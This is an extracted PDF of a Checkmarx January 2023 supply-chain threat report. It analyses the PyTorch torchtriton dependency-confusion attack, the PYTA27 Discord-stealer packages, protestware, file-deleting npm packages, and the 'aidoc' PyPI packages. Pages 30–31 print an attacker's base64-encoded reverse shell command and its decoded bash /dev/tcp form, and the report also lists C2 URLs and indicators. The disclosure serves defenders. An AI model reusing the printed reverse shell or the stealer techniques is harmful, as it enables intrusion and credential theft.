=== SOFTWARE SUPPLY CHAIN SECURITY THREAT LANDSCAPE .pdf ===

--- Página 1 ---
SOFTWARE SUPPLY CHAIN SECURITY
THREAT LANDSCAPE
J a n u a r y  2 0 2 3  O V E R V I E W
Checkmarx © 2023 All rights reserved.

--- Página 2 ---
Checkmarx © 2023 All rights reserved.
The start of the year brought multiple security threats to the open-
source community, as the widely-used Pytorch ML framework was 
infected with a malicious dependency, the continued threat from the 
persistent attacker "PYTA27" releasing new and evolving malicious 
packages, and the growing issue of Protestware causing disruptions 
within the community. Adding to the concern was the discovery of 
malicious code in well-known GitHub projects. All this and more, 
highlight the need for ongoing vigilance in maintaining the integrity 
of open-source software.
Pytorch, a Leading ML Framework was Poisoned with Malicious 
Dependency
During a five-day period, the nightly version of PyTorch, a widely used 
machine learning framework, was compromised in a supply chain 
attack. The infected version contained a malicious dependency that 
used the "dependency confusion" technique to target PyTorch Linux 
users with a C++ malware designed to exfiltrate sensitive information 
to a specified domain through encrypted DNS queries.
Threat Actor “PYTA27” Evolves – Enhancing Their Techniques in 
Recent Supply Chain Attacks
PYTA27, a persistent attacker, was first detected publishing packages 
with a copy of the "WASP" stealer malware. The attacker has since 
continued to release new malicious packages using evolving 
techniques to conceal the code and evade security measures.
Growing Concern of Protestware as it Continues to Shake the 
Open Source Ecosystem
Asolytics is an open-source tool for App Store Optimization (ASO) that 
provides features like keyword popularity, app search result tracking, 
keyword monitoring, and competitor analysis. The tool, however, 
sparked controversy after it was discovered that it includes code that 
replaces "Russia" with "Russian Terrorist State." This highlights the 
danger of mixing politics with open-source development and the 
potential harm to the trust and cohesion among users and 
contributors in the open-source community

--- Página 3 ---
Popular GitHub Project Contains Malicious Code that Deletes 
Critical Files
Malicious npm packages detected deleting files on the victim’s 
machine in case there was an unauthorized usage of the author’s 
code
From Detection to Confrontation: Unmasking a Software 
Supply Chain Attacker
A PyPi user account, named "aidoc," was discovered publishing 
malicious packages containing code that opens a remote shell on 
the victim's machine and establishes persistence by adding the 
harmful command to the ".bashrc" and ".zshrc" files. Josef Harush 
conducted a proactive test on a virtual machine and was able to 
interact with the attacker through a Python script.
Checkmarx © 2023 All rights reserved.

--- Página 4 ---
Checkmarx © 2023 All rights reserved.
Pytorch, a Leading ML 
Framework was Poisoned with 
Malicious Dependency

--- Página 5 ---
Pytorch, a Leading ML Framework was Poisoned with Malicious Dependency 
TLP: White | January 2023 | supplychainsecurity@checkmarx.com | Twitter: @Cx_SCS 
 
KEY FINDINGS 
• 
Between the 25th and the 30th of December 2022, the nightly version of PyTorch, was 
compromised, effecting potentially thousands of machines. 
• 
Only Linux systems were impacted by this attack 
• 
Both "Dependency Confusion" and Starjacking attack techniques were used in this incident 
• 
Once the infected version was downloaded and the malicious code executed, it attempted 
to exfiltrate sensitive information including credentials, ssh keys, lists of files, and more, to a 
specified domain through encrypted DNS queries. 
• 
This was the first recording of a significant dependency confusion attack on the PyPi registry. 
 
EXECUTIVE SUMMARY 
On the 31st of September 2022, Pytorch reported they had been targeted in a software supply chain 
attack. During a five-day period, the nightly version of PyTorch, a widely-used machine learning 
framework, was compromised in a supply chain attack. The infected version contained a malicious 
dependency that used the "dependency confusion" technique to target PyTorch Linux users with a 
C++ malware designed specifically for Linux systems. This malware collected system information, 
accessed sensitive files, and sent the information and file contents to a specified domain through 
encrypted DNS queries. It is likely that thousands of machines were affected by this attack. 
 
Technical Analysis 
About PyTorch 
PyTorch is a popular open-source machine learning library for Python, with total of ~180 million 
downloads. It provides a wide range of tools for training and deploying machine learning models, 
and is particularly well-suited for deep learning. 
 
How PyTorch is Building Releases 
To build PyTorch nightly, as part of its source code there are also Python scripts dedicated to 
building and packaging the project. Some of its dependencies hosted on the project’s self-hosted 
server available on address https://download.pytorch.org/whl/ 
Since the projects is having both other 3rd party dependencies such as jinja2, there’s a hybrid fetch 
flow to first attempt to grab the package from PyPi and if its failing attempt to fetch it from 
https://download.pytorch.org/whl/ .

--- Página 6 ---
Pytorch, a Leading ML Framework was Poisoned with Malicious Dependency 
TLP: White | January 2023 | supplychainsecurity@checkmarx.com | Twitter: @Cx_SCS 
 
 
 
Dependency Confusion Technique 
This attack uses the dependency confusion technique on the PyPi ecosystem. Dependency confusion 
attacks were first revealed by Alex Birsan in 2021. Since then, the technique was used countless of 
times in both PyPi and NPM package registries. 
Python packages which are vulnerable to this technique pulls dependencies packages from locations 
that are not the PyPi registry. Attackers using this technique are publishing to PyPi malicious 
packages with carefully crafted names in an attempt to make the package manager pull the 
malicious dependency from PyPi instead of the original dependency. 
In this current incident, the attacker took advantage of the fact that Pytorch consuming several 
dependency packages from a dedicated package index and the fact that the package manager “pip” 
prioritizes the PyPi package index above other indices. 
Understanding this mechanism, the attack published to the PyPi index a malicious package with a 
name identical to one of Pytorch’s dependency the are usually pulled from the dedicated index. this 
malicious package retains all the original package’s functionality so users will not notice the swap 
and will not experience any difficulties. To the intended functionalities, the attacker added their own 
malicious ones. 
 
“torchtriton” PyPi Package 
On 26 December 2022, “torchtriton” package version 2.0.0 was published to the PyPi registry. In an 
effort to make the package look more reliable, the attacker also used the StarJacking technique 
linking the package to the popular GitHub repository of the original package 
This package is an exact replica of the original “torchtriton” project with the exception of two 
differences: 
1. The malicious “triton” binary located in the “runtime” directory of the package 
2. Several lines in python that were added to the existing “__init__.py” directory. These line 
role is to execute the malicious binary.

--- Página 7 ---
Pytorch, a Leading ML Framework was Poisoned with Malicious Dependency 
TLP: White | January 2023 | supplychainsecurity@checkmarx.com | Twitter: @Cx_SCS 
 
 
The “./triton/runtime/triton” executable inside is an ELF, written in C++, targeted to X64 Linux 
systems. Its main purpose is to collect the following system information: nameservers from 
/etc/resolv.conf, hostname from gethostname(), current username from getlogin(), current working 
directory name from getcwd(), and environment variables. It also reads the following files: 
/etc/hosts, /etc/passwd, the first 1,000 files in $HOME/, $HOME/.gitconfig, and $HOME/.ssh/. All of 
this information, including the contents of the files, is then uploaded via encrypted DNS queries to 
the domain *.h4ck[.]cfd, using the DNS server wheezy[.]io. 
 
Fast Mitigation 
The PyTorch maintainers took steps towards mitigating the issue as they replaced the dependency 
with a different package called "pytorch-triton" and creating a dummy package on PyPI. In addition, 
all nightly packages that depended on "torchtriton" were removed from the package indices at the 
PyTorch download website until further notice.

--- Página 8 ---
Pytorch, a Leading ML Framework was Poisoned with Malicious Dependency 
TLP: White | January 2023 | supplychainsecurity@checkmarx.com | Twitter: @Cx_SCS 
 
 
Impact 
This is the first time we see a significant dependency confusion attack on the PyPi registry. According 
to pepy.tech, the “torch” packages (the name used to install Pytorch) has close to 180 million 
downloads and is one of the two leading ML framework. The nightly versions of framework such as 
this are published with additional features and usually consumed by advanced users. The 
“torchtriton” malicious package itself has around 2.8 thousand downloads. 
This attack is aimed at Linux users and involves a malicious binary file in ELF format. At the time of 
publication, the file had not been detected by any AV vendor on VirusTotal.

--- Página 9 ---
Pytorch, a Leading ML Framework was Poisoned with Malicious Dependency 
TLP: White | January 2023 | supplychainsecurity@checkmarx.com | Twitter: @Cx_SCS 
 
 
Attacker’s disclaimers 
There are indications that the individual responsible for the attack may be a security researcher. This 
includes a message left by the attacker on the domain where the malware sends collected data, the 
domain name itself (h4ck[.]cfd), and a disclaimer included in version 3.0.0 of the malicious software 
stating that it was only created to “discover dependency confusion vulnerabilities.”

--- Página 10 ---
Pytorch, a Leading ML Framework was Poisoned with Malicious Dependency 
TLP: White | January 2023 | supplychainsecurity@checkmarx.com | Twitter: @Cx_SCS 
 
As we discussed in a previous blogpost, despite any messages or disclaimers that may have been 
included, it is clear that the package in question is malicious. Exfiltrating environment variables and 
SSH keys from infected machines is not acceptable behavior for a security researcher. Simply 
claiming to be a security researcher does not give someone permission to engage in malicious 
activity. 
 
Timeline 
- 
17 December 2022 – PyPi user account pytorch-experimental created 
- 
17 December 2022 – Version 0.1.0 of PyPi package torchtriton published 
- 
26 December 2022 - Version 2.0.0 of PyPi package torchtriton published 
- 
30 December 2022 - Version 3.0.0 of PyPi package torchtriton published 
- 
30 December 2022 – PyTorch introduced a commit and published the  
- 
31 December 2022 – PyTorch published they was compromised by a supply chain attack 
 
Conclusion 
This assault serves as more evidence that cybercriminals have been concentrating their efforts on 
the open-source package ecosystem. According to our predictions, this trend will only gain 
momentum in 2023, requiring developers and businesses to implement the necessary security 
measures. 
Since threat actors are ever-evolving and use novel and unexpected tactics, combating them 
continues to be a formidable challenge. These individuals aim to contaminate our software supply 
chain ecosystem. 
In order to defend the open-source ecosystem against these risks, it is essential to speed up 
information flow on these assaults among all stakeholders involved (package registries, security 
researchers, and developers). By collaborating, we can stay ahead of attackers and fight against 
software supply chain attacks. 
 
IOC 
• 
wheezy[.]io 
• 
h4ck[.]cfd 
• 
2385b29489cd9e35f92c072780f903ae2e517ed422eae67246ae50a5cc738a0e 
• 
9c89731a94dd4f2a594a22c1b171cb6c20f55e41

--- Página 11 ---
Checkmarx © 2023 All rights reserved.
Threat Actor “PYTA27” 
Evolves – Enhancing Their 
Techniques In Recent 
Supply Chain Attacks

--- Página 12 ---
Threat Actor “PYTA27” Evolves – Enhancing Their Techniques In Recent Supply Chain Attacks 
TLP: White | January 2023 | supplychainsecurity@checkmarx.com | Twitter: @Cx_SCS 
 
KEY FINDINGS 
• 
The threat actor “PYTA27” has been utilizing W4SP-type malware in their packages for over 
four months. 
• 
PYTA27 has continually improved their methods of disguising the malicious code, making it 
increasingly difficult to detect the payload over time. 
• 
We see a growing number of attackers copying W4SPs concept and adding their custom 
improvements.  
• 
Using open source malware will accelerate the number of attacks to compromise software 
dependencies. 
EXECUTIVE SUMMARY 
As we observe the evolution of attackers, it is clear that they are constantly improving their 
methods. One such attacker, named PYTA27, who has been active for over four months and 
counting, has been distributing malicious packages using various techniques to make detecting and 
removing of their malware more challenging. Studying how attackers adapt and improve their 
methods over time is a valuable tool for security professionals. The fact that this particular attacker 
has been active for a significant amount of time and has demonstrated a willingness to change 
tactics suggests that the risk for users is ongoing and that the effort required for the attacker is 
minimal. This provides a unique opportunity for security professionals to learn from this attacker's 
tactics and improve their own defenses. 
Technical Analysis 
Threat Actor PYTA27 
A few weeks ago, the original GitHub repository of W4SP Stealer was removed by GitHub staff. For 
those of you who are not familiar, W4SP Stealer is an open-source malware that aims to steal all the 
victim's Discord accounts, passwords, crypto wallets, credit cards, and other valuable files on their 
PC and sends them to the attacker via a pre-set Discord webhook address.

--- Página 13 ---
Threat Actor “PYTA27” Evolves – Enhancing Their Techniques In Recent Supply Chain Attacks 
TLP: White | January 2023 | supplychainsecurity@checkmarx.com | Twitter: @Cx_SCS 
 
 
Since then, countless copycats of the same concept have emerged, calling themselves by different 
names such as ANGEL Stealer, Celestial Stealer, Leaf $tealer, Zay injection, and more.    
We dubbed one of those threat actors PYTA27 and this is the story of their evolution over time. 
 
Plain Text 
We first observed PYTA27 activity on the 11th of September with the appearance of four packages 
published at the same hour by the user account "diazz” all with the description "Discord Code."

--- Página 14 ---
Threat Actor “PYTA27” Evolves – Enhancing Their Techniques In Recent Supply Chain Attacks 
TLP: White | January 2023 | supplychainsecurity@checkmarx.com | Twitter: @Cx_SCS 
 
Three of the packages were empty, but one of them contained clear text code for a copycat of the 
"wasp" malware called "zay injection." 
 
From the “colorcolorfull” package 
Since then, in each batch of packages, PYTA27 has attempted to use different techniques to conceal 
the malicious code and make it more difficult to identify the payload. 
Using Obfuscation 
On September 12th, 2022, PYTA27 uploaded the package "color-vividpy," which used the 
Pyobfuscate obfuscator. (Code obfuscation with this tool can easily be deobfuscated following the 
steps in this blog).

--- Página 15 ---
Threat Actor “PYTA27” Evolves – Enhancing Their Techniques In Recent Supply Chain Attacks 
TLP: White | January 2023 | supplychainsecurity@checkmarx.com | Twitter: @Cx_SCS 
 
 
The following four packages that they uploaded targeted Discord. In two of them, the attacker used 
the Hyperion obfuscator (originally used in the W4SP Stealer). On another package, the Python 
obfuscation tool by development-tools.net is used. BTW this brought up old memories with the 
usage of an obfuscator incorporating words such as “love,” “magic,” “joy,” etc. This kind of 
obfuscation was common in obfuscated code over a year ago, but we have seen fewer attackers 
using it in recent months. 
 
From the”pyselfdiscord” package 
Hiding Malicious code at the bottom 
Another technique is adding legitimate code before the malicious part, making it difficult to identify 
at first. They continued to use double obfuscation and added more data to further conceal the

--- Página 16 ---
Threat Actor “PYTA27” Evolves – Enhancing Their Techniques In Recent Supply Chain Attacks 
TLP: White | January 2023 | supplychainsecurity@checkmarx.com | Twitter: @Cx_SCS 
 
malware. (Such as in the "discord-py-v13" package). In all their recent packages, they targeted 
Discord users by using package names and descriptions such as "Used in Discord tools to have great 
natural functionality without errors and interruptions!" 
 
 
From the “discord-py-v13" 
November 2022 – Using a Second Stage 
After that, PYTA27 took a break for about a month and a half and resumed their attack on November 
1st by uploading new packages under a different username (laurenjackson) but with the same 
description as before. 
In another change of their techniques, they added a snippet that downloads a second stage code 
from a remote location (hxxps://www.klgrth[.]io/paste/j2yvv/raw), saves it to a random path with a 
random name and runs it.

--- Página 17 ---
Threat Actor “PYTA27” Evolves – Enhancing Their Techniques In Recent Supply Chain Attacks 
TLP: White | January 2023 | supplychainsecurity@checkmarx.com | Twitter: @Cx_SCS 
 
 
From the “joinerutil" package 
The downloaded obfuscated code was the stealer. In some of the packages, the attacker 
incorporated a persistence mechanism by adding a “SecurityHealthSystray.exe" key in the “run” 
directory in the registry to trigger the payload on startup. This, along with the fact that the code uses 
Windows local path and the python libraries “winreg”, and “wmi” suggests that the code only runs 
on Windows machines.  
At this point, the attacker opened the "ch4zzin" user account and uploaded additional malicious 
packages, this time changing the final payload and using two new types of stealers: "Leaf $tealer" 
and "Celestial Stealer." 
 
 
Adding registry key

--- Página 18 ---
Threat Actor “PYTA27” Evolves – Enhancing Their Techniques In Recent Supply Chain Attacks 
TLP: White | January 2023 | supplychainsecurity@checkmarx.com | Twitter: @Cx_SCS 
 
The Leaf $tealer 
The "Leaf $tealer" can be found on a GitHub repository and describe itself as follow: 
“A thief of discord accounts and Bitcoin wallets (Captures other logins from sites including steam, 
PayPal, sellix, and several other sites) after running once it is injected into the victim's computer, 
always receiving new information after a reboot (Undetectable antivirus).” 
The creator, "diniz," has only created one repository that they continuously update. Inside the 
"injection.py" file, you can find a simple Python script that steals credentials from the victim’s 
machine and installs several dependencies. What's notable is that “diniz” keeps changing the last 
dependency, so if the package gets deleted or removed, their replacement package will be a 
dependency for the project, so it will automatically download it. In the example shown, the 
malicious packages are "realtek" and “coincounter,” but earlier that day, it was changed to a new 
malicious package, "movers". 
 
 
Changing packages names 
 
If you look at the second file in that repository, "module.bat", you can see that it also contains the 
same malicious packages (including one that was removed a long time ago - wniutil).

--- Página 19 ---
Threat Actor “PYTA27” Evolves – Enhancing Their Techniques In Recent Supply Chain Attacks 
TLP: White | January 2023 | supplychainsecurity@checkmarx.com | Twitter: @Cx_SCS 
 
 
Keeping the removed pakcage - wniutil 
They also maintain an active Discord channel that they update whenever they make changes to the 
repository. The discord channel was created in December and was deleted on 18.1.22 by discord due 
to a TOS violation.

--- Página 20 ---
Threat Actor “PYTA27” Evolves – Enhancing Their Techniques In Recent Supply Chain Attacks 
TLP: White | January 2023 | supplychainsecurity@checkmarx.com | Twitter: @Cx_SCS 
Still evolving 
After another break, the attacker appeared again in December 2022 and, since then, has continued 
to publish malicious packages with minor adjustments. After returning to their old username, 
“laurenjackson,” the attacker uploaded packages with a new C2 server and a piece of code ensuring 
the program would exit in case the host operating system is not Windows.  
The reason for this addition is that the package is designed to run on Windows only; attempting to 
install it on different operating systems, such as Linux, will result in errors.  
These days, the C2 server they use is a simple GitHub page 
(https://raw.githubusercontent.com/IvanDevGames/index.js/main/1337.py) that keeps on changing 
whenever a new package is uploaded. 
TTP Evolution 
PYTA27 has been evolving their tactics over time, starting with plain text code, then using 
obfuscation tools such as Pyobfuscate and Hyperion, and finally hiding the malicious code at the 
bottom of legitimate code. 
Another significant aspect to note about PYTA27 is their persistence. This attacker has been active 
for at least four months and has not shown any signs of stopping, which highlights the ongoing risk 
for users. Additionally, PYTA27's willingness to change tactics and use different techniques, such as 
different obfuscation tools, shows that they are actively trying to evade detection. This is why it is 
essential for security professionals to stay informed about the latest tactics and techniques used by 
threat actors like PYTA27. They should also continuously update their defenses accordingly. This 
includes not only technical measures but also educating users to be more cautious about 
downloading and using open-source packages from untrusted sources.

--- Página 21 ---
Threat Actor “PYTA27” Evolves – Enhancing Their Techniques In Recent Supply Chain Attacks 
TLP: White | January 2023 | supplychainsecurity@checkmarx.com | Twitter: @Cx_SCS 
 
 
Conclusion 
This report highlights the ongoing threat of malware distribution and the need for constant vigilance 
and adaptation to protect against it. The attacker “PYTA27,” who was mentioned in the report, has 
shown a willingness to adapt and improve their methods over time, making detecting and removing 
malware more difficult. This serves as a reminder that security professionals must stay informed and 
aware of new techniques and methods to effectively protect against these types of attacks. It also 
shows the importance of open-source intelligence and information sharing among security 
professionals to stay ahead of attackers. The use of code obfuscation, multiple usernames, and 
different packages is a common technique used by attackers, and security professionals should 
always be cautious when downloading packages from untrusted sources. 
Persistent threat actors operating in the open-source code ecosystem are experimenting and 
launching attacks on version control systems, mainly GitHub and package registries such as PyPi and 
NPM. Checkmarx SCS team is continuously tracking these actors to be able to keep its customers 
safe and mitigate attacks quickly after they appear. 
The low risk and ease of launching such attacks ensure that existing attackers will continue their 
activities while more newcomers will start experimenting as and attacking well. 
 
Packages 
The full list of packages can be found at the following link: 
- 
https://gist.github.com/TalFo/f98416d87ca761d79caf0fc9c57315e7 
 
IOC 
The full list of IOC can be found at the following link: 
- 
https://gist.github.com/TalFo/2649fffd635166336ac7d0291040a23e

--- Página 22 ---
Checkmarx © 2023 All rights reserved.
Popular GitHub Project 
Contains Malicious Code that 
Deletes Critical Files

--- Página 23 ---
Popular GitHub Project Contains Malicious Code that Deletes Critical Files 
TLP: White | January 2023 | supplychainsecurity@checkmarx.com | Twitter: @Cx_SCS 
 
KEY FINDINGS 
• 
On January 10th, nine malicious packages from the Pypi user “chuzhixin”, were detected.   
• 
The Malicious code was designed to delete files on the victim’s machine if there was any 
unauthorized usage of the author’s projects. 
• 
The author of the malicious code used techniques such as obfuscation, randomly generated 
variables and function names, and code written in a compact form, to complicate the 
understanding of the code. 
EXECUTIVE SUMMARY 
On January 10, 2023, The Mend research team discovered a new type of malicious code that 
attackers can use to exploit legitimate security and license concerns. The code was designed to 
prevent people from using unlicensed software, specifically in this case, by deleting files on the 
victim’s machine if there was any unauthorized usage of the author’s code. In addition to Mend’s 
report, the Checkmarx supply chain security team were able to uncover additional details, including 
more malicious packages. It seems that the author, “chuzhixin”, had no intention of harming random 
developers, but rather, their aim was to deter thieves from using their paid versions of their open 
website templates. 
Technical Analysis 
Background 
As reported by Mend, the NPM user account jayxuz published the package @jayxuz/rely , including 
malicious code deleting the victim’s project files. 
Our team found additional malicious packages published by jayxuz, and we found it is related to the 
GitHub user account chuzhixin which is the owner of the highly popular chuzhixin/vue-admin-better 
project. 
The chuzhixin/vue-admin-better GitHub project, starred by over 13k users, offers an admin panel 
project template built on top of the popular frontend framework vuejs with multiple sub-
components and eye-candy widgets. 
 
Paid Version 
In addition to the open source version on GitHub, the makers of this successful project offer a paid 
version of the admin panel template with more features. This version is sold on the dedicated 
website https://vue-admin-beautiful.com/.

--- Página 24 ---
Popular GitHub Project Contains Malicious Code that Deletes Critical Files 
TLP: White | January 2023 | supplychainsecurity@checkmarx.com | Twitter: @Cx_SCS 
 
 
vue3-admin-icons malicious code 
Analyzing the npm package @jayxuz/vue3-admin-icons revealed hidden code intended to disrupt 
web applications using a stolen version of the template hosted outside of the allow-list of sites. One 
of the allowed websites is https://vue-admin-beautiful.com/ 
 
Public Statement 
The GitHub user account chuzhixin posted a public statement with an explanation regarding why he 
posted those malicious packages. 
BTW it was originally written in Chinese, and we used Google Translate. The translation might be 
slightly inaccurate. 
They say it was done because “one of our paid users open sourced our paid products to github a few 
years ago”. They continue explaining how it damaged their profits and explained that they just want 
to “retaliate against those who sold it at a low price”

--- Página 25 ---
Popular GitHub Project Contains Malicious Code that Deletes Critical Files 
TLP: White | January 2023 | supplychainsecurity@checkmarx.com | Twitter: @Cx_SCS 
 
 
Conclusion 
Since threat actors are ever-evolving and use novel and unexpected tactics, combating them 
continues to be a formidable challenge. These individuals aim to contaminate our software supply 
chain ecosystem. 
In order to defend the open-source ecosystem against these risks, it is essential to speed up 
information flow on these assaults among all stakeholders involved (package registries, security 
researchers, and developers). By collaborating, we can stay ahead of attackers and fight against 
software supply chain attacks.

--- Página 26 ---
Checkmarx © 2023 All rights reserved.
From Detection to 
Confrontation: Unmasking a 
Software Supply Chain Attacker

--- Página 27 ---
From Detection to Confrontation: Unmasking a Software Supply Chain Attacker 
TLP: White | January 2023 | supplychainsecurity@checkmarx.com | Twitter: @Cx_SCS 
 
KEY FINDINGS 
• 
A PyPi user account, aidoc, was found to have been publishing malicious packages 
• 
The malicious code in the packages opens a remote shell on the victim’s machine and uses a 
simple persistence mechanism by appending the malicious command to the “.bashrc” and 
“.zshrc” files. 
• 
Jossef Harush, Head of SCS Engineering in Checkmarx, conducted a proactive experiment on a 
virtual machine and was able to interact with the attacker via a Python script. 
EXECUTIVE SUMMARY 
Checkmarx SCS team uncovered malicious packages trying to impersonate a medical company. The 
malicious packages contained a payload that opened a remote shell and used a simple mechanism to 
gain persistence on the victim’s machine. We then attempted to contact the attacker to understand the 
intentions behind the act. 
Details 
Over the past few years, the SCS team’s mission has been to fight software supply chain hackers who 
attack developers and users through open-source code. Our goal is to detect as soon as possible and 
report the relevant security teams to jam their operations. 
To support our mission, the team created an automated package analysis pipeline, which scans new 
packages as soon as they are uploaded to the open-source ecosystem. 
One of our engines is called “Watchdog”. This engine is aware of known-as-bad user accounts which 
previously published malicious packages. This engine brings useful context when such user accounts 
make new contributions and out of the many user accounts in our “naughty list”, one PyPi user account 
aidoc (first seen in August 2022) pops up again out of nowhere and starts dropping more of the same.  
 
 
activity over time of PyPi user account aidoc first seen in August 2022

--- Página 28 ---
From Detection to Confrontation: Unmasking a Software Supply Chain Attacker 
TLP: White | January 2023 | supplychainsecurity@checkmarx.com | Twitter: @Cx_SCS 
 
 
In addition, another engine the team integrated into our analysis pipeline is called “Groot”, a dynamic 
analysis engine (sandbox). The purpose of this engine is to thoroughly detonate and analyze open-
source packages by installing, importing, and using SAST tools to invoke functionality within. 
This engine results in a full audit of the package’s behavior, including any files created, subprocesses 
launched, network communications (including TLS traffic), and other useful insights.
 
screenshot from Groot (our dynamic analysis engine) results — audited the behavior of the malicious package 
What’s Inside the Package? 
Upon receiving a prioritized signal from our analysis pipeline, Jossef manually inspected the newly 
published packages.

--- Página 29 ---
From Detection to Confrontation: Unmasking a Software Supply Chain Attacker 
TLP: White | January 2023 | supplychainsecurity@checkmarx.com | Twitter: @Cx_SCS 
 
 
The malicious code is placed in the “setup.py” script and executed upon installation. The attacker used 
function names referring to users as victims such as identifyVictim() and it appears the purpose is to 
open a remote shell on the victim’s machine. The attacker tried to hide the command by encoding it as 
base64

--- Página 30 ---
From Detection to Confrontation: Unmasking a Software Supply Chain Attacker 
TLP: White | January 2023 | supplychainsecurity@checkmarx.com | Twitter: @Cx_SCS 
 
base64 -D <<< 
KGJhc2ggLWMgJzA8JjEwMC07ZXhlYyAxMDA8Pi9kZXYvdGNwLzMuMjIxLjE1Mi4yMDMvNzcxO3NoIDwmM
TAwID4mMTAwIDI+JjEwMCcgPiAvZGV2L251bGwgMj4mMSAmKQo= | sh 
which decodes to 
(bash -c '0<&100-;exec 100<>/dev/tcp/3.221.152.203/771;sh <&100 >&100 2>&100' > 
/dev/null 2>&1 &) 
 
a simple command to initiate remote shell receiving commands from IP address 3.221.152.203 on port 
771. In addition, a simple persistence mechanism was used by appending his malicious base64-encoded 
command to the end of “.bashrc” and “.zshrc” files. 
  
Pro-active Experiment 
Jossef decided to perform a proactive experiment on a virtual machine I created for the task. He started 
by infecting the virtual machine with one of the malicious packages by running the command:

--- Página 31 ---
From Detection to Confrontation: Unmasking a Software Supply Chain Attacker 
TLP: White | January 2023 | supplychainsecurity@checkmarx.com | Twitter: @Cx_SCS 
 
pip install aidoc-e2e-utils 
 
It didn’t take too long before Jossef saw the attacker writing files to disk and reading sensitive files. 
 
screenshot from the pcap file recorded on the virtual machine — attacker sending commands 
 
After letting the attacker play with my virtual machine, Jossef decided to take it to the next level by 
writing a Python script that connects to the attacker’s C2 server using a raw socket and waits to receive 
a new command. 
When such a command is received, the script prompts my confirmation to execute; otherwise, allowing 
me to type whatever made-up output I decide.

--- Página 32 ---
From Detection to Confrontation: Unmasking a Software Supply Chain Attacker 
TLP: White | January 2023 | supplychainsecurity@checkmarx.com | Twitter: @Cx_SCS 
 
 
 
This is the dialog with the attacker on the other end: 
attacker: whoami 
victim: who are you? 
 
attacker: ifconfig 
victim: 192.168.0.1 
 
attacker: ls ~/

--- Página 33 ---
From Detection to Confrontation: Unmasking a Software Supply Chain Attacker 
TLP: White | January 2023 | supplychainsecurity@checkmarx.com | Twitter: @Cx_SCS 
 
victim: yo, lets talk. who are you? 
 
attacker: ls . 
victim: who are you? 
 
attacker: Security Engineer. You? 
victim: Are you sure? security engineers don't write reverse shells. 
 
attacker: ls 
ls 
ls 
ifconfig 
victim: nope. 
 
attacker: ls . 
victim: Where are you from? 
 
attacker: I am checking Internal systems. Dependency confusion you know. If 
not our system, I am killing the shell and drop the connection (just dont 
connect back) See you. 
In their exchange, the attacker claimed to be a security researcher who was “checking Internal systems. 
Dependency confusion you know.” and said that “If not our system, I am killing the shell and drop the 
connection.” 
He knew this attacker did more than he claims as our dynamic analysis engine observed him dropping 
new files and executing commands to read sensitive files such as “cat /etc/passwd”. 
Not to mention that security researchers usually don’t infect other machines with reverse shells and 
connect interactively. 
panic_mode: true 
Shortly after their conversation, Jossef noticed the attacker published new versions to all packages 
owned by PyPi user account aidoc, omitting the word “victim” and removing the remote shell code, 
leaving what appears to be a simple beacon to indicate to the server that one of the packages was 
installed.

--- Página 34 ---
From Detection to Confrontation: Unmasking a Software Supply Chain Attacker 
TLP: White | January 2023 | supplychainsecurity@checkmarx.com | Twitter: @Cx_SCS 
 
 
Although no “DO NOT RUN” warnings and disclaimers exist, Jossef considered this package more 
suitable for research purposes. 
 
Code of Conduct 
Claiming to be a security researcher is not a free pass, if your actions are not in alignment with the 
standards expected of one. 
If the person behind this attack is indeed a security engineer, then it seems suspicious to us that they 
failed to declare their intent and identity as a security professional. Moreover, the reverse shell 
functionality, as well as other actions described in this blog, are not in alignment with what is expected 
from a security researcher. 
Incidents in which actions of individuals claiming to be security professionals caused severe damages, 
such as the poisoning of the popular “ctx” Python package, raise the topic of a certain “code of 
conduct” 
for security researchers in the field of open-source security we recommend reading this story 
discussing the dos and don’ts when performing malicious package research. 
 
Conclusion 
Don’t get mistaken, it’s not a malicious package problem. It’s an attacker's problem.

--- Página 35 ---
From Detection to Confrontation: Unmasking a Software Supply Chain Attacker 
TLP: White | January 2023 | supplychainsecurity@checkmarx.com | Twitter: @Cx_SCS 
 
Apparently, this threat actor was targeting aidoc.com, which is an Israeli startup in the field of 
healthcare artificial intelligence. Jossef has reached out to the company’s CISO and executives to inform 
them that someone might be targeting their organization (as the packages prefixed “aidoc-“ and the 
user account “aidoc”). 
In addition, he reported this activity to PyPi’s security team and they removed the malicious packages. 
The SCS team will continue to monitor the ecosystem for attackers and to continue working together to 
keep the ecosystem safe. 
 
Packages 
The full list of packages can be found at the following link: 
• 
https://medium.com/checkmarx-security/chat-with-a-software-supply-chain-attacker-
98749c28f7b 
 
IOCs 
 
• 
3.129.111.79 
• 
3.221.152.203 
• 
http://3.221.152.203:8000/acl/package/{getFolderName()}/system/{system}/user/{whoami}

